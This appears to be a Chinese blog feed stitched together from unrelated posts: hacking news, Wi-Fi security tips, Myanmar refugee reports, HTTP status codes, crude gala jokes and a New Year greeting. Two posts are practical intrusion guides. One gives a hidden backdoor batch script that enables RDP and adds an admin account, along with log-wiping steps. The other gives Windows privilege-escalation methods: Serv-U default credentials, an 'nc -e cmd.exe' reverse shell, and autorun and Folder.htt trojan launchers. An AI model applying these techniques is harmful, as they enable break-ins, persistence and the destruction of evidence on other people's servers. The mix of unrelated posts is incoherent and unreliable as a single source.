Secbone 发布的文章

叙利亚总统 Bashar al-Assad 正因屠杀平民而面对全世界大多数国家的指责,连黑客组织也没有放过他,在星期一攻陷了他的办公电子邮箱。这次的入侵事件由著名黑客组织无名氏(Anonymous)发动,而取得目标邮箱的密码并无需使用神马手段,因为他们使用的密码简直弱爆了,就是“12345”,根据2011的一份安全研究这是第二弱密码。
无名氏同时将邮箱内的邮件向外公布,其中一封被公布的电邮里叙利亚驻联合国发言人 Sheherazad Jaafari 表示“造成目前严峻的危机一大失误是起初没有建立一支组织严密的警察部队”并指外媒歪曲报导了事实。

安全一直是一个永恒不变的话题。随着无线网络的流行,无线网络的安全问题更加突出。因为无线网络与有线网络相比,不需要物理上线路的连接,完全借助无线电磁波进行连接,因此更容易受到入侵。不过只要我们在使用无线网络时注意下面的一些事项,同样可以保证网络的安全。

一、默认设置不能用

由于无线网络中最重要的设备之一就是无线路由器或中继器。一般来说,同一品牌的无线设备访问地址都是相同的,例如192.168.1.1等;而其默用的用户名、密码也大多为admin;其SSID标识也都一样。如果不修改这些默认的设置,那么入侵者则非常容易的通过扫描工具找到这些设备并进入管理界面,获得设备的控制权。因此,修改默认设置是一项最基本的安全措施。这不仅对无线网络设备有用,对其它共享上网的ADSL、路由等同样有效。

二、禁止SSID广播

启用SSID广播,将有利于无线网络客户端自动接收SSID号,而不必知道无线路由的SSID设置。但是对于家庭用户或有固定用户的朋友来说,完全没有必要启用SSID广播,因为这样做很容易给一些来历不明的入侵者建立连接。作为拥有固定用户客户端的环境,我们完全可以告知他们SSID标识符,让他们自己手工直接输入以建立连接即可。

三、过滤设置

一般的无线宽带路由器都会有过滤方面的设置。过滤一般包括IP地址过滤和MAC地址过滤两项。其中IP地址过滤设置相对复杂一点,一般都是通过单击“添加新条目”等类型的按钮打开创建过滤规则操作窗口,然后设置操作的IP地址,例如我们可以将允许使用的IP地址全部添加进来,同时将其设为“允许通行”,这样没有被添加进来的IP地址则无法连接;同理,如果希望获得更高级的安全,那么则可以在MAC地址过滤中将允许访问的无线客户端网卡的MAC地址添加进来,并设为允许通行即可。

四、手工指定IP

为了方便客户端设置,一般来说无线路由都会带有DHCP功能。其实,对于小规模的无线网络,我们完全可以直接手工为客户端分配IP地址,而不必使用DHCP。因为使用DHCP后,我们不太容易分辩出在线用户中哪些是正常的用户,哪些是非法用户。如果关闭DHCP,那么我们只需要查看当前在线用户,如果发现其IP地址不是分配的,那么则说明其是非法侵入的。

五、设置密钥

针对无线设置,一般来说都会要求我们进行安全认证设置。对此,虽然设置了密钥,将可能给无线客户端的使用增加操作上的复杂程度,但是这与安全相比,还是非常重要的。

六、防Ping

有一些做的比较智能的无线路由都带有防Ping的功能。例如TP-Link WR340G,登录管理界面后,打开“安全设置”,然后在“WAN口Ping”中选中“忽略来自WAN口的Ping”,这样即可躲避一些扫描器的搜索。

七、主动搜索无线网络

无线网络的安全更多的时候是来自临近用户的侵入。例如隔壁用户同样使用了无线网络,那么他在连接的时候则可能因为信号的穿透发现周围有一个无线AP,人都是好奇的,这样他就可能会想办法侵入。基于这样的道理,我们可以先关闭自己的无线AP(路由器),然后搜索一下附近是否有发射点,如果确认没有的话再开启自己的无线路由;如果有的话,那么则必须更加注意安全方面的防范。

  新快报讯 综合央视报道,近日,由于政府与叛军的武装冲突,缅甸一万多人逃亡至中国云南省地区寻求避难,这有可能引发人道主义危机,并让中国陷入复杂的外交困境。据悉,难民多为妇女儿童和老人。

缅甸民族冲突对中国边界安全构成挑战
来源:深圳电视台所属栏目:直播港澳台

最难对付的叛乱力量
近日,缅甸政府与该国最强大的反叛组织“克钦族独立军”发生冲突。双方长达17年的停战协议于去年6月被打破,致使克钦族逃往边境地区。双方在缅甸偏远北部地区发生战事。
1月中旬,缅甸政府与克伦族叛军达成了里程碑式的初步停火协议,与掸族、钦族等其他民族的反叛团体也达成了类似的协议。
但是,与“克钦独立军”的谈判尝试,一再被持续的交战打断,尽管登盛曾在去年12月初下令军方停火。早前的报道称,军方宣称自己是在自卫,反击“克钦独立军”的攻势,而克钦方面的代表则称,“克钦独立军”的基地和周围地区无端受袭。
据最新一期《简氏恐怖主义与安全快报》杂志介绍,“克钦独立军”已成为“缅甸最难以对付的一支叛乱力量。考虑到它的地理位置、军事实力和政治圆滑度,“克钦独立军”可能削弱新政府的各项努力,并在军事上和经济上构成显著威胁”。
难民几乎都是老弱妇孺
一名在缅中边境处理难民问题的克钦族代表最近表示,交战已停止,但双方都还没有撤军,这意味着,“难民们还不能回家”。
援助组织的中国工作人员表示,近日来难民人数“大幅上升”。有关救援组织提供的数据显示:自2012年1月1日以来,克钦地区持续的武装冲突已导致约4万名难民涌向中缅边境,其中有2.5万人已经越过边境,在云南寻求庇护场所。
在靠近中缅边境的盈江县,援助组织工作人员陶美思(音译)表示,当地有大约4万名难民,其中仅盈江县就有2万人,“几乎都是老弱妇孺,还有孕妇和正在哺乳的女性。”
陶美思说,许多难民住在临时的难民营里,其他人在边境两侧的学校和村庄里找到了临时的容身地,还有几千名难民在森林里流浪。
背景知识
缅甸民族大混战
在缅甸近6000万人口中,缅族占了2/3,掸族、克伦族、克钦族、孟族、佤族等是比较大的少数民族。英国殖民缅甸时期采取了“分而治之”的措施,曾造成这个东南亚国家的分裂。1947年2月,为了反对英国殖民政府“分而治之”、成立几个国家的图谋,缅族与主要少数民族在彬龙会议上签署《彬龙协议》。1948年1月4日,缅甸脱离英联邦宣布独立。但殖民者留下的阴影还是让一些少数民族武装在过去几十年中不断与中央政府对抗。缅甸现在有公开的25支民族武装和10多支不常露面的民族武装,仅掸邦就有10多支民族武装经常活动。目前,政府军主要控制了掸邦的54个城市和部分道路,而很多村庄、山区仍处于总兵力上万人的掸邦军武装控制之下,这些地区时常会发生零星冲突。
(据《环球时报》)
相关报道:缅甸局部武装冲突持续 大量难民涌入中缅边境
人民日报报道,随着缅甸的变革持续推进,缅甸政府军和少数民族武装克钦独立军的停火谈判问题日益突出。近日有消息称,双方的冲突有所升级。

1?址协议不支持的协议。

2?检测器内部错误。

3?网址格式不正确。

5?无法连接到代理服务器。

6?无法连接到服务器或找不到域名。

7?连接服务器失败。

28?操作超时。可能原因:页面执行时间过长、服务器压力大。

52?服务器未返回任何内容。

100?Continue 初始的请求已经接受,客户应当继续发送请求的其余部分。Switching Protocols 服务器将遵从客户的请求转换到另外一种协议。

200?OK 一切正常。

201?Created 服务器已经创建了文档,Location头给出了它的URL。

202?Accepted 已经接受请求,但处理尚未完成。

203?Non-Authoritative Information 文档已经正常地返回,但一些应答头可能不正确,因为使用的是文档的拷贝。

204?No Content 没有新文档,浏览器应该继续显示原来的文档。如果用户定期地刷新页面,而Servlet可以确定用户文档足够新,这个状态代码是很有用的。

205?Reset Content 没有新的内容,但浏览器应该重置它所显示的内容。用来强制浏览器清除表单输入内容。

206?Partial Content 客户发送了一个带有Range头的GET请求,服务器完成了它。

300?Multiple Choices 客户请求的文档可以在多个位置找到,这些位置已经在返回的文档内列出。如果服务器要提出优先选择,则应该在Location应答头指明。

301?Moved Permanently 客户请求的文档在其他地方,新的URL在Location头中给出,浏览器应该自动地访问新的URL。

302?Found 类似于301,但新的URL应该被视为临时性的替代,而不是永久性的。注意,在HTTP1.0中对应的状态信息是“Moved Temporatily”。出现该状态代码时,浏览器能够自动访问新的URL,因此它是一个很有用的状态代码。注意这个状态代码有时候可以和301替换使用。例如,如果浏览器错误地请求http://host/~user(缺少了后面的斜杠),有的服务器返回301,有的则返回302。严格地说,我们只能假定只有当原来的请求是GET时浏览器才会自动重定向。请参见307。

303?See Other 类似于301/302,不同之处在于,如果原来的请求是POST,Location头指定的重定向目标文档应该通过GET提取。

304?Not Modified 客户端有缓冲的文档并发出了一个条件性的请求(一般是提供If-Modified-Since头表示客户只想比指定日期更新的文档)。服务器告诉客户,原来缓冲的文档还可以继续使用。305?Use Proxy 客户请求的文档应该通过Location头所指明的代理服务器提取。

307?Temporary Redirect 和302(Found)相同。许多浏览器会错误地响应302应答进行重定向,即使原来的请求是POST,即使它实际上只能在POST请求303时才能重定向。由于这个原因,HTTP 1.1新增了307,以便更加清除地区分几个状态代码:当出现303应答时,浏览器可以跟随重定向的GET和POST请求;如果是307应答,则浏览器只能跟随对GET请求的重定向。

400?Bad Request 请求出现语法错误。

401?Unauthorized 客户试图未经授权访问受密码保护的页面。应答中会包含一个WWW-Authenticate头,浏览器据此显示用户名字/密码对话框,然后在填写合适的Authorization头后再次发出请求。

403?Forbidden 资源不可用。服务器理解客户的请求,但拒绝处理它。通常由于服务器上文件或目录的权限设置导致。

404?Not Found 无法找到指定位置的资源。这也是一个常用的应答。

405?Method Not Allowed 请求方法(GET、POST、HEAD、Delete、PUT、TRACE等)对指定的资源不适用。

406?Not Acceptable 指定的资源已经找到,但它的MIME类型和客户在Accpet头中所指定的不兼容。

407?Proxy Authentication Required 类似于401,表示客户必须先经过代理服务器的授权。

408?Request Timeout 在服务器许可的等待时间内,客户一直没有发出任何请求。客户可以在以后重复同一请求。

409?Conflict 通常和PUT请求有关。由于请求和资源的当前状态相冲突,因此请求不能成功。

410?Gone 所请求的文档已经不再可用,而且服务器不知道应该重定向到哪一个地址。它和404的不同在于,返回407表示文档永久地离开了指定的位置,而404表示由于未知的原因文档不可用。

411?Length Required 服务器不能处理请求,除非客户发送一个Content-Length头。

412?Precondition Failed 请求头中指定的一些前提条件失败。

413?Request Entity Too Large 目标文档的大小超过服务器当前愿意处理的大小。如果服务器认为自己能够稍后再处理该请求,则应该提供一个Retry-After头。

414?Request URI Too Long URI太长。

416?Requested Range Not Satisfiable 服务器不能满足客户在请求中指定的Range头。

500?Internal Server Error 服务器遇到了意料不到的情况,不能完成客户的请求。

501?Not Implemented 服务器不支持实现请求所需要的功能。例如,客户发出了一个服务器不支持的PUT请求。

502?Bad Gateway 服务器作为网关或者代理时,为了完成请求访问下一个服务器,但该服务器返回了非法的应答。

503?Service Unavailable 服务器由于维护或者负载过重未能应答。例如,Servlet可能在数据库连接池已满的情况下返回503。服务器返回503时可以提供一个Retry-After头。

504?Gateway Timeout 由作为代理或网关的服务器使用,表示不能及时地从远程服务器获得应答。

505?HTTP Version Not Supported 服务器不支持请求中所指明的HTTP版本。

10003?网址内容不是文本,无法执行文本检测

10002?网址内容不知是什么类型,无法执行文本检测。

10000?网址内容未包含指定的文字。

20000?内容被修改。

30000?检测到木马、病毒。

一、入侵前的侦察。
首先打开代理或VPN再做如下工作:
第一步:个人感觉,侦察时用来GOOGLE,用以下命令查后台和敏感信息:
site:www.****.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
site:www.*****.com inurl:login|admin|manage|manager|admin_login|login_admin|system
site:www.***.com intitle:管理|后台|登陆|
site:www.****.com intext:验证码
第二步:推荐用TOOLS出品的wwwscan_gui.exe,扫描指定网站目录。这个工具,可以自己DIY里面的字典文件。论坛里有MJJ的社工字典和其他人发的字典工具,都可以加进去。
第三步:用明小子,再次扫描指定网站的注入点、数据库、后台文件。并扫描有没有可能跨站。不要用现成的明小子,自己DIY数据库文件。甚至可以用X-CAN3.0对指定网站的端口如TELNET,FTP扫描。
第四步:根据以上信息,比如,网站类型,管理员注册信息,端口信息。再次GOOGLE收集网站足够多的信息。
二、入侵一般步骤(忽略:因为论坛MJJ们发的东西足够多也足够技术了,本人不再班门弄斧)
三、入侵后的善后工作。
毫无疑问的是三个字:别装B!
第一:别挂黑页,那是小孩子做的事,如果真要挂黑的话,不留下QQ号等个人信息,个人认为这是很重要的事。
第二:清理痕迹:建议用两个工具一是AIO,个人发现,现在的肉鸡上执行命令越来越难了,这个工具执行命令也难多了,但是清理痕迹功能始终很好,很强大。用法:路径\Aio.exe -CleanLog,另一个工具是微软自带的psloglist.exe,这个软件始终不会被杀,也很好很强大,用法,用法可以命令行下/?一下。
第三:用如下方法清理一下上网的痕迹,因为毕竟我们有时会用肉鸡上一下网等等的。
[version]
signature="$CHICAGO$"
[Defaultinstall]
delreg=deleteme
addreg=addme
[deleteme]
hkcu,"software\microsoft\internet explorer\typedurls"
hkcu,"Software\Microsoft\Windows\CurrentVersion\Applets\Paint\recent file list"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\findcomputermru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\prnportsmru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\recentdocs"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\runmru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\streammru"
hkcu,"Software\Microsoft\Windows\CurrentVersion\explorer\streams"
将以上内容保存为 inf 文件 再在此文件点右键安装 即可清除痕迹了,INF文件放于C下,也不易发现。
第四:做下后门,毕竟象SHIFT后门容易让人发现也不强大,所以我们不如直接用BAT作入系统计划任务中:代码如下:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f //开启终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x7d9 /f //改为2009连接终端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x7d9 /f //改为2009连接终端
net user 444 000123 /add
net localgroup administrators 444 /add
以上成为一个BAT文件,然后属性改为隐藏,放入系统计划中。定时运行。当然用这个之前必须看看它的AT服务开了没有,如没有用以下命令执行:
sc config Schedule start= auto net start schedule
当然,直接进入服务改更好便当。

1、原来李婶是小内啊。。。



2.我擦,这不山形健老师么。。。



3. 春晚主持人阵容:一对鸳鸯一对基...三个小受一个T...一个腐女看三P……



4.董卿语录:毕老师跟叔叔干上了。。。



5.董卿语录:毕老师您从哪漏出来的。。。



6.有多少人算不明白厨子是赚了赔了!!!



7.好想看我们山大教授毕老师在电视机前突然大喊一句“凡我在处,便是山大!”…然后画面一转响起“我们向往大啊啊~啊海…!



8.一年一度的年终吐槽大会开始啦!



9.春晚就是中老年人网络词语学习成果展。。。



10.春晚很好地驗證了熵增大是自然規律……



11.当搞基成为一种趋势,连春晚也逃脱不了。。。



12.蔡明一边说着:"肿么了?",一边用双腿紧紧夹住一根粗大笤帚,配合她的白色假发和少女萌音,整个画面有一种诡异的美感。。。。



13.龙是雄的,凤也是雄的,凰才是雌的…………春晚你要搞什么…………



14.力宏是不是电吉他没开。。。



15.还是我们家力宏帅;坤爷帅爆了;eason!eason!邵峰好有型啊;我看到庚庚了!!!忘了费翔了。。。



16.这个舞蹈是一个白富美和高帅富调情,而屌丝跪一地的剧情啊!!



17.春晚看到现在,作为一个党性丰满的掉一地的优秀选手,我看到了,基,本国策。



18.宋国母的绝唱啊,下一届春晚的国母就姓彭了。



19.皇上这场戏不拍完,全都不用吃饭!!!谁吃谁用葵花点穴手点上!!!



20.报告孔庆东,开场曲有一对王八蛋不唱普通话。。。



21. 犯历史错误了啊,“太监”这个词在明代才开始有的!他应该说扮的是“宦官”。



22.春晚明年应该考虑在后面大屏幕上来个人人状态墙嘛!



23.刚看完李云迪和王力宏眉来眼去 李咏和朱军又腻腻歪歪 今年的主题是?” “今年的主题:龙阳”



24.总是担心山形老湿会去脱董卿衣服。



25. 老湿,我明白了,我不是一只鸡啊。——我说过你是吗?



26.把荆轲端上来以后,啊,啊,啊,啊,啊。。。



27.今年春晚好奇葩啊,演电视剧的去唱歌了,唱歌的去说相声了,说相声的去演小品了,演小品的不来春晚了。。。



28. 春晚没有广告所以是连续的。。。然后。。。它可基(积)



29.半根黄瓜?还有半根呢? 对不起...老公....昨晚你不在啊....



30.CCTV基因突变史:CCTV →_→ CCAV →_→ CCGV



31.咖啡就着大蒜,看春晚配着人人评论,岂不快哉!



33.今天的四位男主持李咏,朱军,撒贝宁,毕福剑,四人的名字组合起来是LZSB...笑死我了。。。



34.插播一条,美国海军卡尔文森航母战斗群上起飞的战斗机当地时间17时许袭击了伊朗在霍尔木兹海峡附近的海军基地,击沉15艘伊朗海军军舰,美国白宫目前正在召开记者会,宣布美国正式向伊朗开战。(他就是个状态)



35.你们有没有发现问题的严重性!他们还没有发来贺电!!!



36.连李玉刚的胸都比我大……我不活了,你们别拦着我……



37.表演成功完成后,刘谦正对镜卸妆,镜中忽然伸出一只手轻抚他的脸,一个邪魅低沉的声音响起“谦儿,答应你的我都做到了,现在,是你回报时候了……”



38.我觉得吧,最近状态都开始转向巴神了。。。



39.我看着春晚老觉得他们有基情,特别是孔雀舞,公孔雀才有尾巴,两只有尾巴的公孔雀亲来亲去……



40.姑亮们,零点之前把bra脱了,保证明年没有凶兆啊!!



41. 奥巴马正在看春晚直播,美国中情局头头突然闯进来,递上一份绝密情报:据中国网民线报,我国已对伊朗宣战



42.据说那个女的穿bra了,是肉色的。。。



43.费翔——那些年,咱妈一起追过的男孩!



44.本山大叔不来春晚外边放鞭炮的时间明显不整齐了……



45.“我们俩谁甜!”“你甜!”“为什么?”“她糖尿病!”。。。我擦。。。冯巩这都能知道味道,太重口味了。。。看了十八年春晚,这是最重的一条啊。。。信息量太大了~!!!



46为了配合整个春晚的“基”调,刘谦开始“搞玻璃”。。。



47.还说 春晚没广告 刘谦变了个苹果 还咬了一口。。。



48.刘谦,你敢把你背后的容嬷嬷变成夏雨荷咩?



49我要被央视雷死了!!!!!刚才看新闻,介绍春晚时是这样说的“今年春晚的另一大看点是出现了不少夫妻档,胡军夫妇,羽泉夫妇,沙溢夫妇等”。。。好像有哪里不对啊!!!!!!!!



50.台下坐着的是“低笑点比赛”的全国百强吗……



51.毕老师说,我俩往这一站,舞蹈名就出来了…………凌辱素人.rmvb



52.各位注意到没,刚才李咏用猥琐的小眼神儿瞄着朱军,不一会儿,老毕也偷偷猥琐的瞄着朱军!



53.明星家庭联唱,敢不敢喊彭丽媛和她老公唱一个-_-



54.李咏!放开那群正太萝莉!



55.那未来的儿子,在舞台上掉了100块钱,谁捡到了



56.主持人让我想到一部电影:三渣叔之恋。。。



57.距离下一春晚倒计时还有365天



58.刘谦说镜子里是他朋友,于是出来一只手。。。这只手是怎么成为他朋友的呢?



59.屌丝们普遍对刘谦的镜子很感兴趣,表示一定要弄一个。



60.主持人没说明年再见、、、



61.“董卿小姐,坚硬么?” “恩,坚硬”  “你要我从哪个地方穿进去?”  “中间吧” ==“刘谦再来一次吧,你太棒了!一年不见你的手越来越灵活了。。。”What a fucking day!



62.从瞿颖到周迅再到王菲,跟了李亚鹏嗓子都变哑了,真是一代猛男啊!



63.迟早有一天陈坤的左眉毛会抛弃他的右眉毛冲向宇宙。。。



64.【﹁_﹂】【﹁_﹂】【﹁_﹂】【﹁_﹂】【﹁_﹂】【﹁_﹂】看懂的自觉转



65. 刘谦:“你觉得这颗球在哪里?” 沙溢:“在杯子里。” 刘谦:“你以为它在杯子里,其实它在衣服兜里;你觉得他在衣服兜里,其实它现在在我手里;你认为它在我手里,其实它现在在杯子里,现在把这颗球扔掉。。。。哔里巴拉哔里巴拉哔里巴拉!@¥!@#%……”“葵花点穴手!!!!”世界安静了。



66. 个人觉得今晚最佳的一条状态:杨丽萍表演孔雀舞,这时背景音如果出现赵忠祥浑厚的声音:“每年这个时候就是孔雀交配的季节。”就完美了。



67.原来刘谦在董卿不在的这两年里都是靠镜子!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!



68。2012年中央电视台春节联欢晚会:类型:科幻/犯罪/悬疑/恐怖/灾难/鬼怪/同性......................制片国家/地区:大陆......................语言:汉语普通话......................上映日期:2012.1.22



69.老听着是容嬷嬷协全国炮友给大家拜年……



70.我扫了一个月的黄,终于把你们这俩搞基的扫出来了



71.别说了,给跪了:刘谦能把黄变红,能把黑变粉吗



72.看了吧!一对基遇到正室老婆的结果…居然有一个要扮儿子= =



73.av女优说:我是搞人体体液收集分离刺激新陈代谢研究的



74. 春晚要配套看人人上的各种评论才好看 。。。



75.根据王菲2011年5月28号那条微博推算出王菲如果28天一周期的话。。。。。怪不得老是跑。。。



76.郭冬临叫“好的受“了



77。阴谋:今年的春晚不断的通过各种语言、行为和舞蹈暗示搅基,最后让李玉刚出现来彻底扭转直男的世界观,借此完成下一个五年的计划生育工作……



78.淘宝虽好,可不要多上哦,亲!

首先,在获取webshell后,我们常见的是看一下系统的服务,查看服务可以通过利用扫描器对服务器ip进行扫描,或是在webshell中有执行dos命令时查看net start来查看主机所开放的服务。首先我们说一下从简单的开始说起:





  1。pcanywhere的提权方法



      pcanywhere软件我想大家都了解,为什么将它放在首位就是因为读取密码后直接连接就可以了,如果对方主机在开通了pcanywhere的服务端的话,我们看能否跳转到这个目录C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\,如果行那就最好了,直接下载它的CIF文件,然后使用pcanywhere的密码读取器得到pcAnywhere密码,然后使用pcanywhere登陆即可!接下来就是可视化操作了。



   2。Serv-U提权方法



      Serv-u可以说是网络上比较火的一款FTP服务器软件,有许多像我这样的小黑们都是看系统服务中是否有Serv-u的系统进程来进行提权的。Serv-u的提权方法针对不同的版本也有不同的方法,这里我们就列举一二,可能不是很全,但在其他网友的回复中能够不断的补充吧!



   a.serv-U本地提权:serv-U本地提权一般是利用溢出程序对serv-u的设置上的缺陷进行添加超级账户的功效。例如Xiaolu写的serv-u.exe就是利用sevr-u的默认管理端口,管理员账号和密码进行提权的,默认本地管理端口是:43958,默认管理员:LocalAdministrator,默认密码:#l@$ak#.lk;0@P,这是集成在Serv-u内部的,可以以Guest权限来进行连接,对Serv-u进行管理,利用本地提权的关键就是寻找服务器文件目录中的everyone权限目录,下面我给大家列举些常见的everyone权限目录:

c:\winnt\system32\inetsrv\data\   

是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行

c:\prel 

C:\Program Files\Java Web Start\

c:\Documents and Settings\ 

C:\Documents and Settings\All Users\Documents\ 

很多时候data目录不行,试试这个很多主机都是erveryone 完全控制!

C:\Program Files\Microsoft SQL Server\ 

c:\Temp\ 

c:\mysql\(如果服务器支持PHP) 

c:\PHP(如果服务器支持PHP)

上面一些目录就是常见的,不过也不排除一些特殊的,像江民的kv2004对文件夹的权限设置就不是很严格的。



不过针对本地提权是可以防范的,下面是我在xiaolu的文章中节选的:

防止办法和对策:

        一般防止方法:设置目录权限,通过去掉Web目录iusr用户的执行权限来防止使用Webshell来运行Exp程序。对策:这种方法有一定的局限性,需要设置的目录很多,不能有一点疏漏,比如我就发现很多虚拟主机在C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并运行Exp,这种目录还有x:\php,x:\perl等,因为这种目录都是everyone完全控制的。有些主机还支持php,pl,aspx等,这简直就是服务器的Serv-U灾难,^_^,运行程序更加方便。



        高级一点的防止办法:修改Serv-u管理端口,用Ultraedit打开ServUDaemon.exe查找B6AB(43958的16进制),替换成自己定义的端口比如3930(12345),打开ServUAdmin.exe找到最后一个B6AB替换成3930(12345),启动Serv-u,现在本地管理端口就成了12345了:



TCP 127.0.0.1:12345 0.0.0.0:0 LISTENING 



        对策:对付这种也很简单,netstat –an,就能看到端口了,有人说netstat无法运行,其实你再上传个netstat.exe到可执行目录运行就ok了,然后修改一下Exp编译,上传运行就好了,我修改了一个可以自定义端口的Exp,运行格式:



USAGE: serv-u.exe port "command"

Example: serv-u.exe 43958 "net user xl xiaoxue /add" 



        更高级的防止办法:修改管理员名和密码,用Ultraedit打开ServUDaemon.exe查找Ascii:LocalAdministrator,和#l@$ak#.lk;0@P,修改成等长度的其它字符就可以了,ServUAdmin.exe也一样处理。



        对策:这下默认的管理员连接不上了,还有办法么?嘿嘿,有的管理员安装Serv-u都是使用默认目录C:\Program Files\Serv-U安装,这个目录虽然不能写,也不能修改,但是默认iusr是可以读的,我们可以用webshell来下载ServUDaemon.exe,用Ultraedit打开分析一下,Serv-U的帐号密码就到手了,修改Exp编译上传运行,我们又胜利了。



终极防御:

1.设置好目录权限,不要疏忽大意;

2.Serv-U最好不要使用默认安装路径,设置Serv-U目录的权限,只有管理员才能访问;

3.用我介绍的办法修改Serv-U的默认管理员名字和密码,喜欢的话端口也可以改掉。

c.serv-U管理端口定向转发法:这里需要使用的工具是FPipe.exe

我们要知道Serv-u默认本地管理端口是:43958,这个是只允许本地ip127.0.0.1进行登陆和管理的,那么我们就想能不能通过端口转向来远程管理呢?所以我们用到FPipe.exe,首先是将FPipe.exe上传至服务器中,然后再cmd下执行

Fpipe.exe -v -l 12345-r 43958 127.0.0.1

这里要说明的是,这段字符的意思是当访问12345端口时就会自动转向43958端口,也就是serv-u的管理端口

所以我们在本地安装一个Serv-u,

新建一个服务器,填入对方IP,

user:

LocalAdministrator

pass:

#l@$ak#.lk;0@P

连接上后你就可以管理他的Serv-u了,剩下的操作就是执行上面提到的方法了!

===================================================

Serv-U的方法我就总结出这几个来,可能还有其他的方法我没有看到吧

不过个人认为关键还是本地溢出漏洞的应用要比较多一些,所以网上也常常出现serv-u的本机溢出程序

不同版本的更是层出不穷,前一段时间针对serv-u6.0.2的修改了默认管理员账号和密码的相关文章还请大家参照校园黑客联盟的小鱼修炼中的文章。

Serv-U的提权文章就暂时先总结到这里,有更好的方法还请大家回复!



3.Autorun方法:这种方法也可以说是比较古老的方法,最初应该是从光盘自动播放中寻找到的灵感吧?不进行细说,给出格式即可

制作一个Autoruan.inf文件.内容如下

[AutoRun]

open=bear.exe

bear.exe为木马程序,与autorun.inf放在同一目录下!



4。SAM破解方法: 进入C:\WINNT\system32\config\ 下载他的SAM文件用lc等破解工具破解。



5。相关脚本提权方法:前面的serv-u的ftp提权中提过的vbs这里再说下.进入c:\Documents and Settings\All Users\「开始」菜单\程序\启动    写入bat或vbs文件。这种方法也是属于守株待兔类的,只有在对方主机重起以后才可以达到目的。



6。NC的反弹提权:这里就要说NC的相关用法了,如果在对方服务器中有足够的权限执行nc的话就好了,把它反弹到自己的电脑上,你就可以进行相关操作了!瑞士军刀具体方法不多说,给出格式,如下:

server:nc -e cmd.exe ip 1234

client: nc -l -p 1234



7。conn等asp文件中泄漏SQL帐户密码方法:这种方法说起来应该算是比较侥幸的方法。曾经马俊和我说过一次,原来没有太在意,现在还真的感觉有些好用了,找到账号密码和数据库名在对方没有删除xp_cmdshell条件下用sql连接工具连接即可,连接上后就可以输入你想要的CMD命令了。



8。VNC的相关提权:VNC也是一个类似pcanywhere的远程管理软件,在linux应用广泛,曾经在看台湾的一些服务器中有很多使用VNC的,方法也是我在网络中学到的,不过在应用中就成功过一次,比较郁闷!方法就转载一下吧,网址:http://77169.org/Article/HTML/14184.html

还有要补充的就是vnc是可以反向连接的,这个方法我没有试过,只是曾经看影子做过一个视频动画。



9。desktop.ini与Folder.htt方法。(此方法是在网络看到的)方法如下:首先建立一个文件夹,进入,在空白处点右键,选择“自定义文件夹”一直下点,默认即可。完成后,你就会看到在此目录下多了两个名为Folder setting的文件架与desktop.ini的文件,如果看不到,就把显示所有文件给选上,然后我们在Folder setting目录下找到Folder.htt文件,记事本打开,在任意地方加入以下代码:<OBJECT ID=“RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=“木马名”></OBJECT> 然后你将你的木马文件放在Folder setting目录下,把此目录与desktop.ini一起上传到对方任意一个目录下,就可以了,只要等管理员浏览了此目录,它就执行了我们的木马,此方法也属于类似autorun的守株待兔方法。



10。替换服务提权:我认为比较复杂,不过有些时候也实用,首先是看服务进程,在看我们是否有执行命令的权限,这里要用到的命令是rename,相关用法:

C:\>rename /?

重命名文件。



RENAME [drive:][path]filename1 filename2.

REN [drive:][path]filename1 filename2.



例如替换c:\kv2004\kv.exe的进程

rename c:\kv2004\kv.exe bear.exe

然后再将我们的本地木马文件命名为kv.exe上传到c:\kv2004\目录下,等待对方重新起动机算机即可!

北京时间1月20日消息,据国外媒体报道,美国司法部关闭文件分享网站Megaupload之后,黑客组织Anonymous开始攻击一些大公司与美国政府机构的网站以示报复。



  今天早些时候,Anonymous通过其Twitter主帐户散布了一系列反对SOPA(《停止在线盗版法案》)与PIPA(《知识产权保护法案》)的言论,声称:“既然政府关闭了Megaupload,我们也能在15分钟内关闭政府和唱片公司的网站。走着瞧!”



  此外,Anonymous还宣称对环球唱片(Universal Music)、美国唱片业协会(RIAA)、美国电影协会(MPAA)与美国司法部网站遭到的袭击负责。截至美国太平洋时间下午3点,以上网站依然没有恢复正常,但是有人在Twitter上称它们将慢慢陆续复原。



  该组织还声称,本次攻击行动是“Anonymous有史以来规模最大的攻击”,有5635人参与。本次行动目前仍在进行中,Anonymous扬言称下一个目标是美国联邦调查局(FBI)的网站:“请准备好爆米花……今晚的好戏长着呢。”(悠拉)

    o(∩_∩)o 哈哈,传说中的龙年到了,很开心,呵呵,感觉又回到了小时候,期待着过年,期待着放鞭炮,期待着全家一起包饺子,期待着一起在电视机前吃年夜饭,期待着一年一次的压岁钱,期待着。。。。。  

    今天和老爸出去贴对联,看着到处都是一片红红火火的样子,这就是过年的样子啊~  辞旧迎新,新的一年还有很多美好的东西在等着我们呢~!  2012世界末日? 呵呵,管他呢,过年就应该把一切烦心事全都抛开,好好享受中国传统的喜庆~!

    在这,骨頭也祝大家龙年大吉,快快乐乐,健健康康每一天~!~!